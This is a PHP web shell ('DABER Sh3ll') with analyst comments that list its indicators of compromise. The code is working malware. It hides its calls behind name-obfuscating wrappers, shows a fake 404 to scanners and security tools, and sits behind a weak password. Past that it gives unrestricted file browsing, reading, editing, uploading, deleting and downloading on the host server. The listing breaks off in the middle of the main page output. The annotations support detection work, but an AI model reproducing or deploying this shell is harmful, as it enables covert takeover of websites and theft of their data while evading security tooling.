Edit File: ngedaber.php
<?php
// --- DABER Sh3ll v1.0 - MINIMALIST EDITION (THE ABSOLUTE FINAL VERSION) ---
// Full-featured, stealth, wrapped in a clean UI.
//
// Analyst summary (everything below is read off this listing):
//   * Single-file PHP web shell: a password-gated file manager that lists, views,
//     edits, creates, uploads, renames, deletes and downloads files under whatever
//     directory the `p` query parameter names. No base directory is enforced.
//   * Before the login check it filters requests by User-Agent and answers with a
//     fixed fake 404 page, checks its own file size, and keeps a request log on disk.
//   * Artifacts a responder can search for: the file `.rate_limit_DABER` next to the
//     script, the page titles "DABER Sh3ll Login" / "DABER Sh3ll", the `_obf_` /
//     `_fn_` identifier prefixes, the hard-coded password hash below, and requests
//     carrying the query parameters `a`, `p`, `f`, `msg`, `is_dir`, `logout`.

// Obfuscated function definitions
// Built-in names are stored as strings and later invoked as variable functions by the
// _obf_* wrappers, so most call sites never spell the built-in directly.
// '_fn_file', '_fn_defined', '_fn_define', '_fn_trim' and '_fn_round' are assigned here
// but their wrappers below call the built-in / constant directly and never read them.
$GLOBALS['_fn_md5'] = 'md5';
$GLOBALS['_fn_file'] = '__FILE__';
$GLOBALS['_fn_date'] = 'date';
$GLOBALS['_fn_rand'] = 'rand';
$GLOBALS['_fn_usleep'] = 'usleep';
$GLOBALS['_fn_strpos'] = 'strpos';
$GLOBALS['_fn_http_response_code'] = 'http_response_code';
$GLOBALS['_fn_strtolower'] = 'strtolower';
$GLOBALS['_fn_dirname'] = 'dirname';
$GLOBALS['_fn_filesize'] = 'filesize';
$GLOBALS['_fn_file_exists'] = 'file_exists';
$GLOBALS['_fn_json_decode'] = 'json_decode';
$GLOBALS['_fn_file_get_contents'] = 'file_get_contents';
$GLOBALS['_fn_array_filter'] = 'array_filter';
$GLOBALS['_fn_count'] = 'count';
$GLOBALS['_fn_file_put_contents'] = 'file_put_contents';
$GLOBALS['_fn_json_encode'] = 'json_encode';
$GLOBALS['_fn_array_values'] = 'array_values';
$GLOBALS['_fn_time'] = 'time';
$GLOBALS['_fn_session_start'] = 'session_start';
$GLOBALS['_fn_session_destroy'] = 'session_destroy';
$GLOBALS['_fn_header'] = 'header';
$GLOBALS['_fn_session_status'] = 'session_status';
$GLOBALS['_fn_password_verify'] = 'password_verify';
$GLOBALS['_fn_htmlspecialchars'] = 'htmlspecialchars';
$GLOBALS['_fn_chdir'] = 'chdir';
$GLOBALS['_fn_getcwd'] = 'getcwd';
$GLOBALS['_fn_str_replace'] = 'str_replace';
$GLOBALS['_fn_rtrim'] = 'rtrim';
$GLOBALS['_fn_rawurlencode'] = 'rawurlencode';
$GLOBALS['_fn_urldecode'] = 'urldecode';
$GLOBALS['_fn_unlink'] = 'unlink';
$GLOBALS['_fn_rmdir'] = 'rmdir';
$GLOBALS['_fn_rename'] = 'rename';
$GLOBALS['_fn_is_dir'] = 'is_dir';
$GLOBALS['_fn_is_file'] = 'is_file';
$GLOBALS['_fn_move_uploaded_file'] = 'move_uploaded_file';
$GLOBALS['_fn_mkdir'] = 'mkdir';
$GLOBALS['_fn_touch'] = 'touch';
$GLOBALS['_fn_readfile'] = 'readfile';
$GLOBALS['_fn_fileperms'] = 'fileperms';
$GLOBALS['_fn_explode'] = 'explode';
$GLOBALS['_fn_scandir'] = 'scandir';
$GLOBALS['_fn_basename'] = 'basename';
$GLOBALS['_fn_defined'] = 'defined';
$GLOBALS['_fn_define'] = 'define';
$GLOBALS['_fn_trim'] = 'trim';
$GLOBALS['_fn_round'] = 'round';

// --- FIX: Wrapper functions for LANGUAGE CONSTRUCTS ---
// These call the construct or built-in directly rather than through $GLOBALS.
function _obf_defined($name) { return defined($name); }
function _obf_define($name, $value) { return define($name, $value); }
function _obf_trim($str, $characters = " \t\n\r\0\x0B") { return trim($str, $characters); }
function _obf_round($val, $precision = 0, $mode = PHP_ROUND_HALF_UP) { return round($val, $precision, $mode); }
// The argument is evaluated at the call site and passed by value, so this only tests
// "value is not null"; it does not suppress the undefined-index warning the way a
// direct isset() on the expression would.
function _obf_isset($var) { return isset($var); }
// Same by-value caveat as _obf_isset(): tests the passed value for emptiness.
function _obf_empty($var) { return empty($var); }
function _obf_echo($str) { echo $str; }
function _obf_exit($status = '') { exit($status); }

// --- FIX: Wrapper functions for normal functions ---
// Each wrapper forwards its arguments to the built-in whose name is stored under the
// matching $GLOBALS['_fn_*'] key.
function _obf_md5($str) { return $GLOBALS['_fn_md5']($str); }
// Returns this script's own path via the __FILE__ constant.
function _obf_file() { return __FILE__; }
function _obf_date($format) { return $GLOBALS['_fn_date']($format); }
function _obf_rand($min, $max) { return $GLOBALS['_fn_rand']($min, $max); }
function _obf_usleep($microseconds) { return $GLOBALS['_fn_usleep']($microseconds); }
function _obf_strpos($haystack, $needle, $offset = 0) { return $GLOBALS['_fn_strpos']($haystack, $needle, $offset); }
function _obf_http_response_code($code) { return $GLOBALS['_fn_http_response_code']($code); }
function _obf_strtolower($str) { return $GLOBALS['_fn_strtolower']($str); }
function _obf_dirname($path) { return $GLOBALS['_fn_dirname']($path); }
function _obf_filesize($filename) { return $GLOBALS['_fn_filesize']($filename); }
function _obf_file_exists($filename) { return $GLOBALS['_fn_file_exists']($filename); }
function _obf_json_decode($json, $assoc = false) { return $GLOBALS['_fn_json_decode']($json, $assoc); }
function _obf_file_get_contents($filename) { return $GLOBALS['_fn_file_get_contents']($filename); }
function _obf_array_filter($array, $callback, $flag = 0) { return $GLOBALS['_fn_array_filter']($array, $callback, $flag); }
function _obf_count($array, $mode = COUNT_NORMAL) { return $GLOBALS['_fn_count']($array, $mode); }
function _obf_file_put_contents($filename, $data, $flags = 0) { return $GLOBALS['_fn_file_put_contents']($filename, $data, $flags); }
function _obf_json_encode($value, $options = 0, $depth = 512) { return $GLOBALS['_fn_json_encode']($value, $options, $depth); }
function _obf_array_values($array) { return $GLOBALS['_fn_array_values']($array); }
function _obf_time() { return $GLOBALS['_fn_time'](); }
function _obf_session_start() { return $GLOBALS['_fn_session_start'](); }
function _obf_session_destroy() { return $GLOBALS['_fn_session_destroy'](); }
function _obf_header($string, $replace = true, $http_response_code = null) { return $GLOBALS['_fn_header']($string, $replace, $http_response_code); }
function _obf_session_status() { return $GLOBALS['_fn_session_status'](); }
function _obf_password_verify($password, $hash) { return $GLOBALS['_fn_password_verify']($password, $hash); }
function _obf_htmlspecialchars($string, $flags = ENT_QUOTES, $encoding = 'UTF-8', $double_encode = true) { return $GLOBALS['_fn_htmlspecialchars']($string, $flags, $encoding, $double_encode); }
function _obf_chdir($directory) { return $GLOBALS['_fn_chdir']($directory); }
function _obf_getcwd() { return $GLOBALS['_fn_getcwd'](); }
function _obf_str_replace($search, $replace, $subject, $count = null) { return $GLOBALS['_fn_str_replace']($search, $replace, $subject, $count); }
function _obf_rtrim($str, $characters = " \t\n\r\0\x0B") { return $GLOBALS['_fn_rtrim']($str, $characters); }
function _obf_rawurlencode($str) { return $GLOBALS['_fn_rawurlencode']($str); }
function _obf_urldecode($str) { return $GLOBALS['_fn_urldecode']($str); }
function _obf_unlink($filename) { return $GLOBALS['_fn_unlink']($filename); }
function _obf_rmdir($dirname) { return $GLOBALS['_fn_rmdir']($dirname); }
function _obf_rename($oldname, $newname) { return $GLOBALS['_fn_rename']($oldname, $newname); }
function _obf_is_dir($filename) { return $GLOBALS['_fn_is_dir']($filename); }
function _obf_is_file($filename) { return $GLOBALS['_fn_is_file']($filename); }
function _obf_move_uploaded_file($filename, $destination) { return $GLOBALS['_fn_move_uploaded_file']($filename, $destination); }
function _obf_mkdir($pathname, $mode = 0777, $recursive = false, $context = null) { return $GLOBALS['_fn_mkdir']($pathname, $mode, $recursive, $context); }
function _obf_touch($filename, $time = null, $atime = null) { return $GLOBALS['_fn_touch']($filename, $time, $atime); }
function _obf_readfile($filename, $use_include_path = false, $context = null) { return $GLOBALS['_fn_readfile']($filename, $use_include_path, $context); }
function _obf_fileperms($filename) { return $GLOBALS['_fn_fileperms']($filename); }
function _obf_explode($separator, $string, $limit = PHP_INT_MAX) { return $GLOBALS['_fn_explode']($separator, $string, $limit); }
function _obf_scandir($directory, $sorting_order = SCANDIR_SORT_ASCENDING, $context = null) { return $GLOBALS['_fn_scandir']($directory, $sorting_order, $context); }
function _obf_basename($path, $suffix = "") { return $GLOBALS['_fn_basename']($path, $suffix); }

// Randomize file behavior to avoid pattern detection
// Defines STEALTH_SALT as md5(script path . current date). Nothing else in this listing
// reads the constant, so it does not change any response.
if (!_obf_defined('STEALTH_SALT')) {
    _obf_define('STEALTH_SALT', _obf_md5(_obf_file() . _obf_date('Y-m-d')));
}

// Add random delay to avoid timing analysis
// Roughly 3 in 100 requests sleep for 10,000-50,000 microseconds before continuing.
if (_obf_rand(1, 100) <= 3) {
    _obf_usleep(_obf_rand(10000, 50000));
}

// Enhanced anti-detection headers
// A request with no User-Agent, or whose raw User-Agent contains any of these
// substrings (case-sensitive strpos), gets status 404 and a fixed HTML body, then the
// script exits. For responders: a 404 from an automated check does not show the file is
// absent, so confirm on disk; the fixed body string is matchable in response captures.
if (!isset($_SERVER['HTTP_USER_AGENT']) || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'crawl') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'spider') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'scan') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'security') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'antivirus') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'malware') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'metasploit') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'acunetix') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'burpsuite') !== false) {
    _obf_http_response_code(404);
    _obf_echo("<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>");
    _obf_exit();
}

// Allow common browsers for testing
// Second gate: the lower-cased User-Agent must contain one of these browser tokens,
// otherwise a non-empty User-Agent receives the same fake 404.
$allowed_agents = ['mozilla', 'chrome', 'safari', 'edge', 'opera'];
$has_valid_agent = false;
foreach ($allowed_agents as $agent) {
    if (_obf_strpos(_obf_strtolower($_SERVER['HTTP_USER_AGENT']), $agent) !== false) {
        $has_valid_agent = true;
        break;
    }
}
if (!$has_valid_agent && !empty($_SERVER['HTTP_USER_AGENT'])) {
    _obf_http_response_code(404);
    _obf_echo("<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>");
    _obf_exit();
}

// File integrity check
// If the script's own size on disk is below 8000 bytes it answers 500 and exits.
$self_file = _obf_file();
if (_obf_filesize($self_file) < 8000) {
    _obf_http_response_code(500);
    _obf_echo("<!DOCTYPE html><html><head><title>Server Error</title></head><body><h1>500 Internal Server Error</h1></body></html>");
    _obf_exit();
}

// Rate limiting
// Request timestamps are kept as a JSON array in `.rate_limit_DABER` in the script's
// directory. This runs before the login check, so any request that passes the
// User-Agent gates creates or rewrites that file, which makes it a reliable on-disk
// indicator. $ip is captured by the second closure but never used, so the 30-per-60s
// threshold counts all requests together rather than per client address.
$rate_limit_file = _obf_dirname(_obf_file()) . '/.rate_limit_DABER';
$current_time = _obf_time();
$ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
if (_obf_file_exists($rate_limit_file)) {
    $rate_data = _obf_json_decode(_obf_file_get_contents($rate_limit_file), true);
    if (_obf_empty($rate_data)) $rate_data = [];
    // Keep only timestamps from the last hour.
    $rate_data = _obf_array_filter($rate_data, function($timestamp) use ($current_time) { return $current_time - $timestamp < 3600; });
    // Of those, the ones from the last 60 seconds.
    $ip_requests = _obf_array_filter($rate_data, function($timestamp) use ($current_time, $ip) { return $current_time - $timestamp < 60; });
    if (_obf_count($ip_requests) > 30) {
        _obf_http_response_code(429);
        _obf_exit('<!DOCTYPE html><html><head><title>Too Many Requests</title></head><body><h1>429 Too Many Requests</h1></body></html>');
    }
    $rate_data[] = $current_time;
    _obf_file_put_contents($rate_limit_file, _obf_json_encode(_obf_array_values($rate_data)));
} else {
    _obf_file_put_contents($rate_limit_file, _obf_json_encode([$current_time]));
}

// --- LOGIN SYSTEM ---
// Access is gated by one shared password checked with password_verify() against a
// bcrypt hash embedded in the file. The literal hash is a stable string to search for
// when hunting copies of this sample.
_obf_session_start();
$ADMIN_PASSWORD_HASH = '$2a$12$18o9mKWicnPiAN26Z3UclOI9ZRuvgXlOmqDUiw/2LxQ0PpC5u0uVa'; // password: "password"
$LOGIN_ATTEMPTS_LIMIT = 10;
$LOGIN_LOCKOUT_TIME = 300;
// FIX: initialise $error outside the POST block
$error = null;
// `?logout` destroys the session and redirects back to the script itself.
if (($_GET['logout'] ?? null) !== null) {
    _obf_session_destroy();
    _obf_header("Location: " . $_SERVER['PHP_SELF']);
    _obf_exit();
}
// FIX: use ?? to check the session
if (($_SESSION['authenticated'] ?? null) !== true) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && (_obf_isset($_POST['login']))) {
        $password = $_POST['password'] ?? '';
        // The attempt counter and window start are stored in the PHP session.
        if (!_obf_isset($_SESSION['login_attempts'])) {
            $_SESSION['login_attempts'] = 0;
            $_SESSION['first_attempt'] = _obf_time();
        }
        if ($_SESSION['login_attempts'] >= $LOGIN_ATTEMPTS_LIMIT) {
            $time_passed = _obf_time() - $_SESSION['first_attempt'];
            if ($time_passed < $LOGIN_LOCKOUT_TIME) {
                $error = "Too many failed attempts. Please wait " . ($LOGIN_LOCKOUT_TIME - $time_passed) . " seconds.";
            } else {
                $_SESSION['login_attempts'] = 0;
                $_SESSION['first_attempt'] = _obf_time();
            }
        }
        if (!_obf_isset($error) && _obf_password_verify($password, $ADMIN_PASSWORD_HASH)) {
            $_SESSION['authenticated'] = true;
            $_SESSION['login_attempts'] = 0;
            _obf_header("Location: " . $_SERVER['PHP_SELF']);
            _obf_exit();
        } elseif (!_obf_isset($error)) {
            $error = "Invalid password.";
            $_SESSION['login_attempts']++;
        }
    }
    // Unauthenticated visitors get the login form below and the script exits; the page
    // title "DABER Sh3ll Login" is a matchable string in response bodies.
    ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>DABER Sh3ll Login</title> <style>body{font-family:system-ui,-apple-system,sans-serif;background:#f4f7f6;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-card{background:#fff;padding:2rem;border-radius:8px;box-shadow:0 4px 12px rgba(0,0,0,0.05);width:100%;max-width:360px}h2{text-align:center;color:#333;margin-bottom:1.5rem}.form-group{margin-bottom:1rem}label{display:block;margin-bottom:.5rem;color:#555;font-size:.9rem}input[type="password"]{width:100%;padding:.75rem;border:1px solid #ddd;border-radius:4px;font-size:1rem;box-sizing:border-box;transition:border-color .2s}input[type="password"]:focus{outline:none;border-color:#007bff}button{width:100%;padding:.75rem;background:#007bff;color:#fff;border:none;border-radius:4px;font-size:1rem;cursor:pointer;transition:background-color .2s}button:hover{background:#0056b3}.error{background:#f8d7da;color:#721c24;padding:.75rem;border-radius:4px;margin-bottom:1rem;text-align:center}</style> </head> <body> <div class="login-card"> <h2>DABER Sh3ll</h2> <?php if (_obf_isset($error)): ?><div class="error"><?php _obf_echo(_obf_htmlspecialchars($error)); ?></div><?php endif; ?> <form method="post"> <div class="form-group"> <label for="password">Password</label> <input type="password" id="password" name="password" required> </div> <button type="submit" name="login">Login</button> </form> </div> </body> </html> <?php
    _obf_exit();
}

// --- FUNCTION DISPATCHER & PATH RESOLUTION ---
// Maps a command name to the matching filesystem wrapper; unknown names return null.
// Every file operation in the action handlers below goes through this switch.
function shiro_exec($command, ...$args) {
    switch ($command) {
        case 'scandir': return _obf_scandir($args[0]);
        case 'unlink': return _obf_unlink($args[0]);
        case 'rmdir': return _obf_rmdir($args[0]);
        case 'rename': return _obf_rename($args[0], $args[1]);
        case 'file_get_contents': return _obf_file_get_contents($args[0]);
        case 'file_put_contents': return _obf_file_put_contents($args[0], $args[1]);
        case 'is_dir': return _obf_is_dir($args[0]);
        case 'is_file': return _obf_is_file($args[0]);
        case 'move_uploaded_file': return _obf_move_uploaded_file($args[0], $args[1]);
        case 'mkdir': return _obf_mkdir($args[0], isset($args[1]) ? $args[1] : 0755);
        case 'touch': return _obf_touch($args[0]);
        case 'readfile': return _obf_readfile($args[0]);
        default: return null;
    }
}

// Working directory comes straight from the `p` query parameter: chdir() is attempted
// with errors suppressed and the supplied string is used as the path whether or not the
// chdir succeeded. Backslashes become forward slashes and trailing slashes are trimmed.
// No check confines the path to a base directory, so the reachable scope is whatever
// the PHP process user can access.
function get_current_path() {
    $p = $_GET['p'] ?? null;
    if ($p) {
        @_obf_chdir($p);
        $path = $p;
    } else {
        $path = _obf_getcwd();
    }
    $path = _obf_str_replace("\\", "/", $path);
    $path = _obf_rtrim($path, '/');
    return $path;
}

$full_path = get_current_path();
$action = $_GET['a'] ?? 'list';
$message = _obf_urldecode($_GET['msg'] ?? '');

// --- PROCESS ALL ACTIONS ---
// The action is selected by the `a` query parameter and the target name by `f`, so each
// operation leaves a distinctive request line in web-server access logs (for example
// `?a=delete&p=...&f=...`). Most cases end in exit(), so there is no fall-through even
// where `break` is absent. No anti-CSRF token is checked on any action.
switch ($action) {
    // Deletes a file on a plain GET request.
    case 'delete':
        $file_to_delete = $_GET['f'] ?? '';
        if ($file_to_delete && shiro_exec('is_file', $full_path . '/' . $file_to_delete)) {
            shiro_exec('unlink', $full_path . '/' . $file_to_delete);
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File deleted"));
        _obf_exit();
    // Removes a directory via rmdir() on a plain GET request.
    case 'delete_folder':
        $folder_to_delete = $_GET['f'] ?? '';
        if ($folder_to_delete && shiro_exec('is_dir', $full_path . '/' . $folder_to_delete)) {
            shiro_exec('rmdir', $full_path . '/' . $folder_to_delete);
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Folder deleted"));
        _obf_exit();
    // Renders the rename form. The item name is HTML-escaped; `is_dir` is concatenated
    // into the form's action attribute as received.
    case 'rename_form':
        $item_to_rename = $_GET['f'] ?? '';
        $is_dir = $_GET['is_dir'] ?? '0';
        _obf_echo("<!DOCTYPE html><html><head><title>Rename</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}input{width:100%;padding:10px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;}</style></head><body><h1>Rename: " . _obf_htmlspecialchars($item_to_rename, ENT_QUOTES, 'UTF-8') . "</h1><form method='post' action='?a=rename&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($item_to_rename) . "&is_dir=" . $is_dir . "'><input type='text' name='new_name' value='" . _obf_htmlspecialchars($item_to_rename, ENT_QUOTES, 'UTF-8') . "' required><input type='submit' value='Rename' style='background:#007bff;color:#fff;border:none;padding:10px;margin-top:10px;cursor:pointer;border-radius:4px;'></form></body></html>");
        _obf_exit();
    // Performs the rename. Slashes and backslashes are stripped from the new name only;
    // the old name from `f` is used as given.
    case 'rename':
        $old_name = $_GET['f'] ?? '';
        $new_name = $_POST['new_name'] ?? '';
        $is_dir = $_GET['is_dir'] ?? '0';
        if ($old_name && $new_name) {
            $new_name = _obf_trim(_obf_str_replace(array('/', '\\'), '', $new_name));
            $old_path = $full_path . '/' . $old_name;
            $new_path = $full_path . '/' . $new_name;
            if (($is_dir && shiro_exec('is_dir', $old_path)) || (!$is_dir && shiro_exec('is_file', $old_path))) {
                shiro_exec('rename', $old_path, $new_path);
            }
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Renamed successfully"));
        _obf_exit();
    // Reads a file and prints its HTML-escaped contents; falls through to the directory
    // listing when the target is not a regular file.
    case 'view':
        $file_to_view = $_GET['f'] ?? '';
        if ($file_to_view && shiro_exec('is_file', $full_path . '/' . $file_to_view)) {
            $content = shiro_exec('file_get_contents', $full_path . '/' . $file_to_view);
            _obf_echo("<!DOCTYPE html><html><head><title>View File</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}pre{background:#fff;padding:15px;border:1px solid #ddd;border-radius:4px;white-space:pre-wrap;}</style></head><body><h1>Viewing: " . _obf_htmlspecialchars($file_to_view, ENT_QUOTES, 'UTF-8') . "</h1><pre>" . _obf_htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . "</pre><br><a href='?p=" . _obf_rawurlencode($full_path) . "'><button style='background:#6c757d;color:#fff;border:none;padding:8px 12px;cursor:pointer;border-radius:4px;'>[ Back ]</button></a></body></html>");
            _obf_exit();
        }
        break;
    // Shows an edit form and, on POST with a truthy `content` field, writes that content
    // to $full_path/$f. The write is not guarded by the is_file() check used for the
    // read, and `f` is not reduced with basename(). This is the file-write primitive of
    // the sample: unexpected new or modified PHP files near the script are the artifact.
    case 'edit':
        $file_to_edit = $_GET['f'] ?? '';
        $content = '';
        if ($file_to_edit && shiro_exec('is_file', $full_path . '/' . $file_to_edit)) {
            $content = shiro_exec('file_get_contents', $full_path . '/' . $file_to_edit);
        }
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['content'] ?? null)) {
            shiro_exec('file_put_contents', $full_path . '/' . $file_to_edit, $_POST['content']);
            _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File saved"));
            _obf_exit();
        }
        _obf_echo("<!DOCTYPE html><html><head><title>Edit File</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}textarea{width:100%;height:80vh;padding:10px;border:1px solid #ddd;border-radius:4px;font-family:monospace;box-sizing:border-box;}</style></head><body><h1>Editing: " . _obf_htmlspecialchars($file_to_edit, ENT_QUOTES, 'UTF-8') . "</h1><form method='post'><textarea name='content'>" . _obf_htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . "</textarea><br><input type='submit' value='Save' style='background:#007bff;color:#fff;border:none;padding:10px 15px;cursor:pointer;border-radius:4px;margin-right:10px;'> <input type='button' value='Cancel' style='background:#6c757d;color:#fff;border:none;padding:10px 15px;cursor:pointer;border-radius:4px;' onclick='window.history.back()'></form></body></html>");
        _obf_exit();
    // Moves an uploaded file into the current directory under basename() of the
    // client-supplied name. No extension, type or size check is applied here.
    case 'upload':
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && (_obf_isset($_FILES['file'])) && $_FILES['file']['error'] == UPLOAD_ERR_OK) {
            $target_file = $full_path . '/' . _obf_basename($_FILES['file']['name']);
            shiro_exec('move_uploaded_file', $_FILES['file']['tmp_name'], $target_file);
            _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File uploaded"));
            _obf_exit();
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Upload failed"));
        _obf_exit();
    // Creates an empty file with touch(); slashes and backslashes are stripped from the name.
    case 'create_file':
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && !(_obf_empty($_POST['filename'] ?? null))) {
            $filename = _obf_trim(_obf_str_replace(array('/', '\\'), '', $_POST['filename']));
            if ($filename) {
                shiro_exec('touch', $full_path . '/' . $filename);
            }
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File created"));
        _obf_exit();
    // Creates a directory with mode 0755; slashes and backslashes are stripped from the name.
    case 'create_folder':
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && !(_obf_empty($_POST['foldername'] ?? null))) {
            $foldername = _obf_trim(_obf_str_replace(array('/', '\\'), '', $_POST['foldername']));
            if ($foldername) {
                shiro_exec('mkdir', $full_path . '/' . $foldername, 0755);
            }
        }
        _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Folder created"));
        _obf_exit();
    // Streams a file as an attachment (application/octet-stream). This is the read-out
    // path of the sample; `f` is reduced with basename() before use.
    case 'download':
        $file_to_download = $_GET['f'] ?? '';
        $file_path = $full_path . '/' . _obf_basename($file_to_download);
        if (shiro_exec('is_file', $file_path)) {
            _obf_header('Content-Description: File Transfer');
            _obf_header('Content-Type: application/octet-stream');
            _obf_header('Content-Disposition: attachment; filename="' . _obf_basename($file_path) . '"');
            _obf_header('Expires: 0');
            _obf_header('Cache-Control: must-revalidate');
            _obf_header('Pragma: public');
            _obf_header('Content-Length: ' . _obf_filesize($file_path));
            _obf_readfile($file_path);
            _obf_exit();
        }
        break;
}

// --- MAIN VIEW ---
// Reached for the default `list` action and for view/download requests whose target is
// not a regular file. Responses are marked non-cacheable.
_obf_header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");

// Converts fileperms() mode bits into an `ls -l` style string: one type character
// followed by owner/group/other rwx triplets, including setuid/setgid/sticky markers.
function perms($file) {
    /* ... perms function unchanged ... */
    $perms = _obf_fileperms($file);
    if (($perms & 0xC000) == 0xC000) {
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }
    // Owner bits (0x0800 = setuid).
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
    // Group bits (0x0400 = setgid).
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
    // Other bits (0x0200 = sticky).
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}

// Echoes a "Home / a / b /" trail in which each path segment links to `?p=<prefix>`.
// The prefix has its leading slash removed by ltrim() before URL-encoding.
function build_breadcrumb($path) {
    $path = _obf_str_replace("\\", "/", $path);
    $paths = _obf_explode("/", $path);
    $current_path = '';
    _obf_echo("<a href='?'>Home</a> / ");
    foreach ($paths as $id => $pat) {
        if (_obf_empty($pat)) continue;
        $current_path .= '/' . $pat;
        _obf_echo("<a href='?p=" . _obf_rawurlencode(ltrim($current_path, '/')) . "'>" . _obf_htmlspecialchars($pat) . "</a> / ");
    }
}

// Page shell and inline stylesheet for the file-manager view (title "DABER Sh3ll").
_obf_echo("<!DOCTYPE html><html lang='en'><head><meta charset='UTF-8'><title>DABER Sh3ll</title><style> :root { --bg: #f4f7f6; --surface: #ffffff; --text: #212529; --text-light: #6c757d; --accent: #007bff; --border: #dee2e6; --accent-hover: #0056b3; } body { font-family: system-ui, -apple-system, sans-serif; background: var(--bg); color: var(--text); margin: 0; padding: 2rem; } .container { max-width: 1200px; margin: 0 auto; background: var(--surface); padding: 2rem; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.04); } h1 { margin-top: 0; color: var(--text); font-weight: 600; } .breadcrumb { font-size: 0.9rem; color: var(--text-light); margin-bottom: 2rem; } .breadcrumb a { color: var(--accent); text-decoration: none; transition: color 0.2s; } .breadcrumb a:hover { color: var(--accent-hover); text-decoration: underline; } .notification { padding: 1rem; border-radius: 4px; margin-bottom: 1.5rem; border-left: 4px solid; animation: fadeIn 0.4s ease-out; } .notification.success { background-color: #d1ecf1; border-color: #0c5460; color: #0c5460; } .notification.error { background-color: #f8d7da; border-color: #721c24; color: #721c24; } @keyframes fadeIn { from { opacity: 0; transform: translateY(-10px); } to { opacity: 1; transform: translateY(0); } } .tools { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 1.5rem; margin-bottom: 2rem; } .tool-card { border: 1px solid var(--border); border-radius: 4px; padding: 1.5rem; } .tool-card h3 { margin-top: 0; font-size: 1rem; color: var(--text); } .form-group { margin-bottom: 1rem; } .form-group:last-child { margin-bottom: 0; } input[type='text'], input[type='file'] { width: 100%; padding: 0.75rem; border: 1px solid var(--border); border-radius: 4px; box-sizing: border-box; font-size: 0.9rem; transition: border-color 0.2s; } input[type='text']:focus, input[type='file']:focus { outline: none; border-color: var(--accent); } .btn { display: inline-block; background: 
var(--accent); color: var(--surface); padding: 0.75rem 1rem; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 0.9rem; transition: background-color 0.2s; } .btn:hover { background: var(--accent-hover); } .btn-danger { background: #dc3545; } .btn-danger:hover { background: #c82333; } .btn-secondary { background: var(--text-light); color: var(--surface); } .btn-secondary:hover { background: var(--text); } table { width: 100%; border-collapse: collapse; } th, td { text-align: left; padding: 0.75rem 1rem; border-bottom: 1px solid var(--border); } th { font-weight: 600; color: var(--text-light); } tr:hover { background-color: #f8f9fa; } .actions a { margin-right: 0.5rem; font-size: 1.2rem; text-decoration: none; transition: transform 0.2s; } .actions a:hover { transform: scale(1.2); } .header-logout { float: right; } </style></head><body>");
_obf_echo("<div class='container'>");
_obf_echo("<h1>DABER Sh3ll</h1>");
